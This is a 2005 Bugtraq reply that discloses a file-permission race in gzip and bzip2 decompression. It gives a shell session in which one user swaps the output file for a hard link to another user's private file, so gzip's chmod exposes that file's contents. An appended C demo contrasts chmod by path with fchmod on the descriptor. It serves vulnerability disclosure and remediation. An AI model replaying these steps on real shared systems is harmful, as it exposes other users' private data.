Bugtraq mailing list archives
Re: gzip TOCTOU file-permissions vulnerability
From: Theodor Milkov <zimage () icdsoft com>
Date: Thu, 14 Apr 2005 09:36:04 +0300
Joey Hess wrote:
Martin Pitt wrote:
<cut>
Maybe I understood you wrong, could you please give a small test case which describes the vulnerability exactly?
I'm a wimp, so I will use gdb instead of writing some real exploit to win the race.
It is quite easy to win the race when the file that's being decompressed is big:
---
# adduser user-good
# adduser user-evil
# usermod -G src user-good
# usermod -G src user-evil
# mkdir /var/www/proj
# chown root.src /var/www/proj
# chmod 2775 /var/www/proj
user-good@zimage:/var/www/proj$ echo "Rather secret data" > secf.txt
user-good@zimage:/var/www/proj$ chmod 400 secf.txt
user-good@zimage:/var/www/proj$ ls -al secf.txt
-r-------- 1 user-good src 19 Apr 14 09:16 secf.txt
user-evil@zimage:/var/www/proj$ dd if=/dev/zero of=bigf.bin bs=1M count=256
user-evil@zimage:/var/www/proj$ gzip bigf.bin
user-evil@zimage:/var/www/proj$ chmod 666 bigf.bin.gz
user-evil@zimage:/var/www/proj$ ls -la secf.txt bigf.bin.gz
-rw-rw-rw- 1 user-evil src 260543 Apr 14 09:17 bigf.bin.gz
-r-------- 1 user-good src 19 Apr 14 09:16 secf.txt
user-evil@zimage:/var/www/proj$ cat secf.txt
cat: secf.txt: Permission denied
user-good@zimage:/var/www/proj$ gzip -d bigf.bin.gz
user-evil@zimage:/var/www/proj$ rm -f bigf.bin ; ln secf.txt bigf.bin
user-evil@zimage:/var/www/proj$ ls -la secf.txt bigf.bin
-rw-rw-rw- 2 user-good src 19 Apr 14 09:17 bigf.bin
-rw-rw-rw- 2 user-good src 19 Apr 14 09:17 secf.txt
user-evil@zimage:/var/www/proj$ cat secf.txt
Rather secret data
---
The time between the beginning of decompression and the unlink+delete was about 2 sec., and decompression finished about 7-8 seconds later.
The same was tested and applies to bzip2.

Best regards,
Theodor
--
Theodor Milkov http://www.zimage.del.bg/
CCNA, CCNP, MCP
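
Added example, not part of the original post and not gzip's or bzip2's code: the session above is consistent with a mode change applied by file name after the name has been re-pointed at another inode. The C sketch below replays that final step on its own scratch files and contrasts chmod() on the path with fchmod() on the descriptor the output was written through; the function name, file names and modes are assumptions made for the demo.

```c
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Permission bits of a path, or -1 on error (hypothetical helper). */
static int mode_of(const char *path) {
    struct stat st;
    return stat(path, &st) == 0 ? (int)(st.st_mode & 0777) : -1;
}

/* Replays the decompressor's last step in a private scratch directory.
 * use_fd == 0: chmod("out.bin")  - the name is resolved again, after the swap.
 * use_fd == 1: fchmod(out)       - acts on the inode that was actually opened.
 * Returns the resulting mode of "secret" (created 0400), or -1 on failure. */
int secret_mode_after_restore(int use_fd) {
    char dir[] = "/tmp/toctou-demo-XXXXXX";
    if (!mkdtemp(dir) || chdir(dir) != 0) return -1;

    int s = open("secret", O_CREAT | O_WRONLY | O_EXCL, 0400);
    if (s < 0) return -1;
    close(s);

    /* Output file is created and kept open while data is written. */
    int out = open("out.bin", O_CREAT | O_WRONLY | O_EXCL, 0600);
    if (out < 0) return -1;

    /* Constructed stand-in for the swap in the session: the output name
     * now refers to the inode of "secret", not to the file we opened. */
    if (unlink("out.bin") != 0 || link("secret", "out.bin") != 0) return -1;

    /* Copy the archive's 0666 mode onto the "output". */
    int rc = use_fd ? fchmod(out, 0666) : chmod("out.bin", 0666);
    close(out);
    int result = rc == 0 ? mode_of("secret") : -1;

    unlink("out.bin"); unlink("secret");
    if (chdir("/") != 0 || rmdir(dir) != 0) return -1;
    return result;
}

int main(void) {
    printf("chmod by path: secret mode %o\n", secret_mode_after_restore(0));
    printf("fchmod on fd:  secret mode %o\n", secret_mode_after_restore(1));
    return 0;
}
```

On Linux systems with fs.protected_hardlinks=1 the `ln` step from the session is refused when the caller neither owns the target nor has read and write access to it; applying the mode through the descriptor removes the dependence on the name regardless of that setting.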